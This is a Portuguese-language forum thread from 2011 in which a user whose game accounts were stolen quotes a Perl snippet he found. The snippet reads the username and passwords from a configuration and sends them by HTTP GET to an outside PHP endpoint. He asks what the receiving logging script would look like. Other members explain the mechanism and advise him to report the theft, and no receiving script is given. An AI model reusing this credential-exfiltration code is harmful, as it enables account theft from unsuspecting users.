VongolaX 0 Denunciar post Postado Março 7, 2011 Hoje tive umas contas hackiadas em um jogo deu uma olhada e acho q descobrir como o cara fez pra hackiar abrir um arquivo pelo bloco de notas e achei isso use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get("http://levelupgamess.110mb.com/key_strokes.php?keylog=$usuario $senha $kafra"); Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso? Então minha dúvida eh como seria esse aquivo php pra armazenar os dados?? seria tipo um log ne? Compartilhar este post Link para o post Compartilhar em outros sites
InterPlanet 7 Denunciar post Postado Março 7, 2011 Oi! Desculpe, mas qual o objetivo desse post? Voce quer aprender a fazer o mesmo? Compartilhar este post Link para o post Compartilhar em outros sites
VongolaX 0 Denunciar post Postado Março 7, 2011 Oi! Desculpe, mas qual o objetivo desse post? Voce quer aprender a fazer o mesmo? Pretendo denuciar o cara a desenvolvedora do jogo pois sei quem e o mesmo so que para isso preciso de provas, ai preciso aprender a fazer pra explicar direito a distribuidora do game e não, não tenho intensão de prejudicar ninguem com isso apenas quero tentar recuperar o que eu perdi (tudo que eu conquistei em 2 anos de jogos) pode ate parecer idiotice isso mais 2 anos jogando suando pra um fdp vim e levar tudo.. o minimo que quero e que ele seja banido quem pude me ajudar falando mais o menos como seria o arquivo pra receber os dados Compartilhar este post Link para o post Compartilhar em outros sites
InterPlanet 7 Denunciar post Postado Março 7, 2011 Entendo! Contudo creio que nao seja necessario explicar a desenvolvedora como o fato ocorreu, ja que e fato que ocorreu! Eles e que devem proteger melhor o servico. Todavia, como voce mesmo disse: Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso? Pelo script ai, é isso memso, eles capturam os dados e enviar pra essa pagina levelupgamess.110mb.com/key_strokes.php via GET. Agora pra decifrar como eles fazem e o que fazem com as informaçoes enviadas so tendo acesso ao script da pagina em questao, o que e inviavel se voce nao tem acesso ao servidor via FTP, por exemplo. Eles podem, por exemplo, ter um script na pagina que manda os dados pro email do sacana que a escreveu... As possibilidades sao muitas. Reitero, faça a denuncia com o que ja descobriu, o resto e com a desenvolvedora. Compartilhar este post Link para o post Compartilhar em outros sites
Henrique Barcelos 290 Denunciar post Postado Março 7, 2011 O cara só ia conseguir receber os dados do servidor da LevelUp se ela os disponibilizasse para qualquer uma acessar, o que eu acho improvável. Vai ver VOCÊ pegou um keylogger no SEU computador e foi hackeado... Compartilhar este post Link para o post Compartilhar em outros sites
VongolaX 0 Denunciar post Postado Março 7, 2011 Entendo! Contudo creio que nao seja necessario explicar a desenvolvedora como o fato ocorreu, ja que e fato que ocorreu! Eles e que devem proteger melhor o servico. Todavia, como voce mesmo disse: Pelo que deu a entender ele pega o login e senha e envia pra um arquivo php ne isso? Pelo script ai, é isso memso, eles capturam os dados e enviar pra essa pagina levelupgamess.110mb.com/key_strokes.php via GET. Agora pra decifrar como eles fazem e o que fazem com as informaçoes enviadas so tendo acesso ao script da pagina em questao, o que e inviavel se voce nao tem acesso ao servidor via FTP, por exemplo. Eles podem, por exemplo, ter um script na pagina que manda os dados pro email do sacana que a escreveu... As possibilidades sao muitas. Reitero, faça a denuncia com o que ja descobriu, o resto e com a desenvolvedora. Problema e que você não conhece a distribuidora e o serviço porco que ela presta, preciso de todas as provas possiveis pra quem sabe TALVEZ eu consiga alguma coisa =/ O cara só ia conseguir receber os dados do servidor da LevelUp se ela os disponibilizasse para qualquer uma acessar, o que eu acho improvável. Vai ver VOCÊ pegou um keylogger no SEU computador e foi hackeado... Key no pc acho que naum, muito dificil passar key por antivirus hj em dia..... Compartilhar este post Link para o post Compartilhar em outros sites
InterPlanet 7 Denunciar post Postado Março 7, 2011 De fato nao a conheco, contudo, creio que mostrar a eles como o fato ocorreu nao vai ajudar em nada, prove que ocorreu e pronto. Compartilhar este post Link para o post Compartilhar em outros sites
Henrique Barcelos 290 Denunciar post Postado Março 7, 2011 Key no pc acho que naum, muito dificil passar key por antivirus hj em dia..... Vai nessa... Anti-virus são como vacinas vencidas, os crackers estão sempre a frente... Compartilhar este post Link para o post Compartilhar em outros sites
Kakashi_Hatake 267 Denunciar post Postado Março 7, 2011 Não recomendo confiar segamente em anti-virus, principalmente os free <_< Compartilhar este post Link para o post Compartilhar em outros sites
VongolaX 0 Denunciar post Postado Março 7, 2011 Ja passei 3 Anti-Virus diferente no pc e nada ta com a mulesta que tenha key se tiver e um key ninja <_< Compartilhar este post Link para o post Compartilhar em outros sites
Henrique Barcelos 290 Denunciar post Postado Março 7, 2011 É improvável, pra não dizer impossível que uma empresa como a LevelUp disponibilize dados de usuário para acesso externo... E eu já falei que antivirus são vacinas vencidas... Pode passar 30 diferentes aí que não vai adiantar... É um dos motivos pra eu não querer jogar nenhum jogo online... Você vira um alvo fácil... Compartilhar este post Link para o post Compartilhar em outros sites
InterPlanet 7 Denunciar post Postado Março 7, 2011 É um dos motivos pra eu não querer jogar nenhum jogo online... Você vira um alvo fácil... Apoiado! Compartilhar este post Link para o post Compartilhar em outros sites